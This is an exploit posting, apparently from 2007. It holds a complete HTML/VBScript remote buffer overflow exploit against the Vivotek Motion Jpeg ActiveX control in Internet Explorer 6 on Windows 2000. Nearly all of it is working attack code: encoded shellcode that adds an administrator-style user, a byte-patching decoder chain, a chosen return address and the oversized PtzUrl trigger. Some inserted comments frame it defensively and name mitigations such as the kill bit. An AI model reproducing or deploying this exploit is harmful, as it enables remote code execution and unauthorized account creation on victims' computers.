




2007-06-03 Vivotek Motion Jpeg Control (MjpegDecoder.dll 2.0.0.13) Remote Exploit
Rated as : High Risk

<!-- IE 6 / Vivotek Motion Jpeg Control (MjpegDecoder.dll 2.0.0.13)
remote buffer overflow exploit / win 2k sp4 en version
by rgod
site: retrogod.altervista.org

software site: http://www.vivotek.com/
"VIVOTEK INC. is a leading IP surveillance camera and Network
camera firm specialized in IP camera, Wireless network camera,
IP surveillance camera"

some notes,
PtzUrl property is vulnerable to a stack based buffer overflow
we control EIP, ESI, EDI and EBP, *all* through UNICODE-expanded
strings
I used the "venetian method" to fully patch the shellcode
This works remotely (roughly 2 times out of 3) or by dragging the html file
into the browser window, not by clicking it

Object safety report:

RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
-->
<HTML>
<OBJECT classid='clsid:EAA105FE-7BBD-4196-8B96-D46743894195'
id='MjpegControl' ></OBJECT>
<script language='vbscript'>

' metasploit one, alpha2... add a user 'sun' with pass 'tzu'
' Encoded payload stage (the author's note above is the only description of
' what it does). The blob opens with a long run of repeated %40%6e and %90
' bytes before the encoded body. From a defender's side, the observable is a
' PtzUrl value assembled from unescape() strings of this length with long
' repeated-byte runs -- that shape, not the exact bytes, is what a content
' filter or proxy rule should key on.
FRAGMENT =
unescape("%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%71%40%71%40%71%40%71%40%71%40%72%40%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%eb%59%05%f8%ff%49%49%49%49%49%49%49%49%49%51%6a%58%30%31%42%42%78%42%42%41%30%41%50%42%75%39%6c%48%44%70%70%50%4b%35%6c%4b%6c%65%58%31%6f%4b%6f%38%4b%4f%70%61%6b%69%6b%34%6b%51%6e%31%70%79%6c%64%30%64%37%31%7a%4d%51%72%6b%54%4b%34%44%64%65%45%6b%4f%44%31%6b%66%4b%6c%6b%4b%6f%4c%71%4b%4b%4c%6b%51%4b%79%6c%54%74%73%61%50%64%4b%70%50%75%70%58%6c%4b%50%6c%6b%50%6c%4d%6b%38%48%4b%79%6b%30%50%70%30%70%4b%78%4c%6f%41%46%50%46%69%58%53%70%6b%50%48%6e%38%72%53%38%78%4e%6a%4e%37%6f%47%73%6d%44%4e%35%38%45%50%6f%43%30%4e%45%34%30%55%33%75%42%70%43%65%4e%50%54%58%35%70%4f%61%44%34%50%56%56%50%4e%55%64%50%6c%6f%63%51%4c%47%72%6f%75%70%30%71%44%6d%49%6e%79%73%74%62%41%64%6f%62%63%50%33%65%4e%50%6f%71%34%74%50%c3")

' Small hand-encoded stubs. Each REM records the instruction the author intends
' the bytes to become once the control has UNICODE-expanded the string (see the
' "venetian method" remark in the header). Note that VBScript identifiers are
' case-insensitive, so `c1` here and `C1` in the CODE expression below name
' the same variable.
c1 = unescape("%95")                : REM xchg eax, ebp
C2 = unescape("%6e%05%ff%02")       : REM add eax 0200ff00h
C3 = unescape("%6e%2d%12%02")       : REM sub eax 02001200h
C4 = unescape("%6e%40%6e")          : REM inc eax
C5 = unescape("%80%90%6e%40%6e%40") : REM add byte ptr eax 90 , inc eax twice
C6 = unescape("%6e%80%90%6e%40%6e%40") : REM and again ... add byte ptr esi works as nop

' Decoder chain: the C6-style stub is repeated unchanged for the first thirty
' lines, then from the "%6e%80%03..." line on the third byte of each half-line
' takes a different value per line. That per-line variation appears to be the
' byte-by-byte patching the header calls the "venetian method" -- TODO confirm
' against the author's notes; nothing else on this page explains it.
' None of this is something a defender needs to replicate: the root cause is
' the missing length check on PtzUrl in the control, and the practical
' mitigations are the vendor fix or preventing IE from instantiating the
' CLSID declared in the OBJECT tag above (kill bit).
CODE = C1 & C2 & C3 & C4 & C5 & C6 & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%90%6e%40%6e%40") & _
unescape("%6e%80%90%6e%40%6e%40%6e%80%03%6e%40%6e%40") & _
unescape("%6e%80%eb%6e%40%6e%40%6e%80%e8%6e%40%6e%40") & _
unescape("%6e%80%ff%6e%40%6e%40%6e%80%ff%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%49%6e%40%6e%40") & _
unescape("%6e%80%37%6e%40%6e%40%6e%80%5a%6e%40%6e%40") & _
unescape("%6e%80%68%6e%40%6e%40%6e%80%50%6e%40%6e%40") & _
unescape("%6e%80%41%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%41%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%38%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%6d%6e%40%6e%40%6e%80%69%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%35%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%55%6e%40%6e%40") & _
unescape("%6e%80%4c%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%46%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%33%6e%40%6e%40%6e%80%48%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%75%6e%40%6e%40") & _
unescape("%6e%80%76%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%52%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%58%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%6b%6e%40%6e%40") & _
unescape("%6e%80%4e%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%6f%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%6f%6e%40%6e%40%6e%80%4b%6e%40%6e%40") & _
unescape("%6e%80%44%6e%40%6e%40%6e%80%65%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%38%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%76%6e%40%6e%40") & _
unescape("%6e%80%56%6e%40%6e%40%6e%80%51%6e%40%6e%40") & _
unescape("%6e%80%4a%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%66%6e%40%6e%40") & _
unescape("%6e%80%43%6e%40%6e%40%6e%80%48%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%6c%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%62%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%7a%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%4a%6e%40%6e%40") & _
unescape("%6e%80%4f%6e%40%6e%40%6e%80%43%6e%40%6e%40") & _
unescape("%6e%80%77%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%55%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%6c%6e%40%6e%40%6e%80%43%6e%40%6e%40") & _
unescape("%6e%80%66%6e%40%6e%40%6e%80%6f%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%66%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%46%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%42%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%6e%6e%40%6e%40%6e%80%45%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%7a%6e%40%6e%40") & _
unescape("%6e%80%37%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%53%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%4c%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%47%6e%40%6e%40") & _
unescape("%6e%80%6b%6e%40%6e%40%6e%80%73%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%6a%6e%40%6e%40%6e%80%4d%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%30%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%49%6e%40%6e%40%6e%80%32%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%6e%6e%40%6e%40") & _
unescape("%6e%80%4b%6e%40%6e%40%6e%80%4e%6e%40%6e%40") & _
unescape("%6e%80%64%6e%40%6e%40%6e%80%46%6e%40%6e%40") & _
unescape("%6e%80%59%6e%40%6e%40%6e%80%7a%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%66%6e%40%6e%40") & _
unescape("%6e%80%55%6e%40%6e%40%6e%80%64%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%51%6e%40%6e%40%6e%80%72%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%74%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%74%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%35%6e%40%6e%40") & _
unescape("%6e%80%53%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%72%6e%40%6e%40") & _
unescape("%6e%80%54%6e%40%6e%40%6e%80%65%6e%40%6e%40") & _
unescape("%6e%80%36%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%67%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%37%6e%40%6e%40") & _
unescape("%6e%80%77%6e%40%6e%40%6e%80%37%6e%40%6e%40") & _
unescape("%6e%80%72%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%31%6e%40%6e%40%6e%80%77%6e%40%6e%40") & _
unescape("%6e%80%50%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%73%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%52%6e%40%6e%40") & _
unescape("%6e%80%30%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%30%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%33%6e%40%6e%40") & _
unescape("%6e%80%62%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%42%6e%40%6e%40%6e%80%70%6e%40%6e%40") & _
unescape("%6e%80%61%6e%40%6e%40%6e%80%50%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%31%6e%40%6e%40") & _
unescape("%6e%80%70%6e%40%6e%40%6e%80%41%6e%40%6e%40") & _
unescape("%6e%80%71%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%74%6e%40%6e%40%6e%80%61%6e%40%6e%40") & _
unescape("%6e%80%32%6e%40%6e%40%6e%80%57%6e%40%6e%40") & _
unescape("%6e%80%64%6e%40%6e%40%6e%80%53%6e%40%6e%40") & _
unescape("%6e%80%47%6e%40%6e%40%6e%80%63%6e%40%6e%40") & _
unescape("%6e%80%75%6e%40%6e%40%6e%80%90%6e%40%6e%40%6e%40%6e")

' Layout of the oversized string handed to the control, as the author built it:
'   bof          262 filler bytes
'   eip          the two bytes the author aims at the saved return address
'                (the REM gives the expanded value and its origin)
'   useful_junk  four bytes the author marks as not to be altered
'   junk         32 more filler bytes
'   CODE, FRAGMENT, then a 16-byte %90 tail
' The trigger is the single property assignment at the end: PtzUrl receives
' a string several hundred characters long that is in no sense a URL, and the
' header states the control copies it into a fixed stack buffer. For
' detection, a script-driven PtzUrl assignment of that length is the
' observable; the fix belongs in the control (length check) or in the browser
' (refusing to instantiate the CLSID).
bof         = string(262,unescape("%12"))
useful_junk = unescape("%12%12%12%12") 'not touch
junk        = string(32,unescape("%12"))
eip         = unescape("%23%7d") : REM 0x007d0023   call edi, module comctl32 found with msfpescan
suntzu      = bof + eip + useful_junk + junk + CODE + FRAGMENT +
string(16,unescape("%90"))

MjpegControl.PtzUrl = suntzu

</script>
</HTML>


securitydot.net - 2007-06-03
